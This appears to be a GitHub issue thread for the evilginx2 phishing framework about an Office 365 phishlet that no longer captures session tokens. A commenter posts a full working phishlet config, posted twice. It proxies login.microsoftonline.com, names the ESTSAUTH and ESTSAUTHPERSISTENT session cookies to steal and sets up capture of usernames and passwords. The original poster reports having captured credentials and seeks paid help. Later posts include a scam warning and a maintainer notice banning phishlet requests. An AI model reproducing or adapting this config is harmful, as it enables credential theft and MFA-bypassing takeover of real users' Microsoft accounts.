Closed afiqizzuddinz closed 1 year ago
Hi,
The SignInStateCookie needs its domain changed to '.login.microsoftonline.com' for token capturing to start working again.
auth_tokens:
- domain: '.login.microsoftonline.com'
keys: ['ESTSAUTH', 'ESTSAUTHPERSISTENT', 'SignInStateCookie']
# - domain: 'login.microsoftonline.com'
# keys: ['SignInStateCookie']
The problem I am having right now is that I can not locate the session cookies. I do not know where to copy from. Any1 that can help me? I was able to capture the username and password. In the token section it says “None”
Replace the o365.yaml phishlet with the following and token capturing should start working again.
name: 'o365'
author: '@jamescullum'
min_ver: '2.3.0'
proxy_hosts:
- {phish_sub: 'login', orig_sub: 'login', domain: 'microsoftonline.com', session: true, is_landing: true}
- {phish_sub: 'www', orig_sub: 'www', domain: 'office.com', session: false, is_landing:false}
# The lines below are needed if your target organization utilizes ADFS.
# If they do, you need to uncomment all following lines that contain <...>
# To get the correct ADFS subdomain, test the web login manually and check where you are redirected.
# Assuming you get redirected to adfs.example.com, the placeholders need to be filled out as followed:
# <insert-adfs-subdomain> = adfs
# <insert-adfs-host> = example.com
# <insert-adfs-subdomain-and-host> = adfs.example.com
#- {phish_sub: 'adfs', orig_sub: '<insert-adfs-subdomain>', domain: '<insert-adfs-host>', session: true, is_landing:false}
#- {phish_sub: 'adfs', orig_sub: '<insert-adfs-subdomain>', domain: '<insert-adfs-host>:443', session: true, is_landing:false}
sub_filters:
- {triggers_on: 'login.microsoftonline.com', orig_sub: 'login', domain: 'microsoftonline.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
- {triggers_on: 'login.microsoftonline.com', orig_sub: 'login', domain: 'microsoftonline.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript'], redirect_only: true}
# Uncomment and fill in if your target organization utilizes ADFS
#- {triggers_on: '<insert-adfs-subdomain-and-host>', orig_sub: 'login', domain: 'microsoftonline.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
auth_tokens:
- domain: '.login.microsoftonline.com'
keys: ['ESTSAUTH', 'ESTSAUTHPERSISTENT', 'SignInStateCookie']
credentials:
username:
key: '(login|UserName)'
search: '(.*)'
type: 'post'
password:
key: '(passwd|Password)'
search: '(.*)'
type: 'post'
login:
domain: 'login.microsoftonline.com'
path: '/'
Thank you for your reply. But this is beyond my comprehension. I swear I do not know how I can replace the o356.yaml phishlet. Is there any one you can recommend to me that can assist me further please.
On Mon, 29 Nov 2021 at 6:20 PM, oposm @.***> wrote:
Replace the o365.yaml https://github.com/kgretzky/evilginx2/blob/master/phishlets/o365.yaml phishlet with the following and token capturing should start working again.
name: 'o365' author: @.***' min_ver: '2.3.0' proxy_hosts:
- {phish_sub: 'login', orig_sub: 'login', domain: 'microsoftonline.com', session: true, is_landing: true}
- {phish_sub: 'www', orig_sub: 'www', domain: 'office.com', session: false, is_landing:false}
The lines below are needed if your target organization utilizes ADFS.
If they do, you need to uncomment all following lines that contain <...>
To get the correct ADFS subdomain, test the web login manually and check where you are redirected.
Assuming you get redirected to adfs.example.com, the placeholders need to be filled out as followed:
= adfs
= example.com
= adfs.example.com - {phish_sub: 'adfs', orig_sub: '
', domain: ' ', session: true, is_landing:false} - {phish_sub: 'adfs', orig_sub: '
', domain: ' :443', session: true, is_landing:false} sub_filters:
- {triggers_on: 'login.microsoftonline.com', orig_sub: 'login', domain: 'microsoftonline.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
- {triggers_on: 'login.microsoftonline.com', orig_sub: 'login', domain: 'microsoftonline.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript'], redirect_only: true}
Uncomment and fill in if your target organization utilizes ADFS
- {triggers_on: '
', orig_sub: 'login', domain: 'microsoftonline.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']} auth_tokens:
- domain: '.login.microsoftonline.com' keys: ['ESTSAUTH', 'ESTSAUTHPERSISTENT', 'SignInStateCookie'] credentials: username: key: '(login|UserName)' search: '(.)' type: 'post' password: key: '(passwd|Password)' search: '(.)' type: 'post' login: domain: 'login.microsoftonline.com' path: '/'
— You are receiving this because you commented. Reply to this email directly, view it on GitHub https://github.com/kgretzky/evilginx2/issues/691#issuecomment-981846522, or unsubscribe https://github.com/notifications/unsubscribe-auth/AWWSB4XEIIVXR6GXRET7C6DUOOY7BANCNFSM5I6DIEVQ . Triage notifications on the go with GitHub Mobile for iOS https://apps.apple.com/app/apple-store/id1477376905?ct=notification-email&mt=8&pt=524675 or Android https://play.google.com/store/apps/details?id=com.github.android&referrer=utm_campaign%3Dnotification-email%26utm_medium%3Demail%26utm_source%3Dgithub.
see:
Thank you so much for your quick response. Please is there anyone that I can add on telegram or any platform that can teach me or show me how to do this? I am willing to learn, please.
On Tue, Nov 30, 2021 at 6:45 PM Melroy @.***> wrote:
see:
677 https://github.com/kgretzky/evilginx2/issues/677
— You are receiving this because you commented. Reply to this email directly, view it on GitHub https://github.com/kgretzky/evilginx2/issues/691#issuecomment-982513650, or unsubscribe https://github.com/notifications/unsubscribe-auth/AWWSB4XOOLWRRV6GZC5KRRLUOSTLBANCNFSM5I6DIEVQ . Triage notifications on the go with GitHub Mobile for iOS https://apps.apple.com/app/apple-store/id1477376905?ct=notification-email&mt=8&pt=524675 or Android https://play.google.com/store/apps/details?id=com.github.android&referrer=utm_campaign%3Dnotification-email%26utm_medium%3Demail%26utm_source%3Dgithub.
but are you willing to search for basic commands?
No, I am not. I am looking for someone who can connect via SSH and help me fix it even if it's for a fee. reason I want to connect with the person via telegram or any platform. Please help me.
On Tue, Nov 30, 2021 at 6:53 PM Melroy @.***> wrote:
but are you willing to search for basic commands?
— You are receiving this because you commented. Reply to this email directly, view it on GitHub https://github.com/kgretzky/evilginx2/issues/691#issuecomment-982520047, or unsubscribe https://github.com/notifications/unsubscribe-auth/AWWSB4VJD2AGDXKDVSM7H7DUOSUKXANCNFSM5I6DIEVQ . Triage notifications on the go with GitHub Mobile for iOS https://apps.apple.com/app/apple-store/id1477376905?ct=notification-email&mt=8&pt=524675 or Android https://play.google.com/store/apps/details?id=com.github.android&referrer=utm_campaign%3Dnotification-email%26utm_medium%3Demail%26utm_source%3Dgithub.
Hello, I have been able to replace the o365.yaml phishlet with the following below yet the 0365 token isn't captured. What can I do please.
name: 'o365' author: '@jamescullum' min_ver: '2.3.0' proxy_hosts:
sub_filters:
auth_tokens:
All issues can be fixed.... It's cuased due to update on the target end..... You can reach how to the developer on icq @mrgretzky
All issues can be fixed.... It's cuased due to update on the target end..... You can reach how to the developer on icq @mrgretzky
You are a scammer using kgretzky i.d to scamm people for phishlets guys beware of him
DO NOT ASK FOR PHISHLETS.
DO NOT ASK FOR HELP CREATING PHISHLETS.
DO NOT ASK TO FIX PHISHLETS.
DO NOT ADVERTISE OR TRY TO SELL PHISHLETS.
EXPECT A BAN OTHERWISE. THANK YOU!
REPORT ONLY BUGS OR FEATURE SUGGESTIONS.
Hello, want to ask, o365 doesnt capture token, do i need to configure the phishlets or is there something else because my account has mfa enabled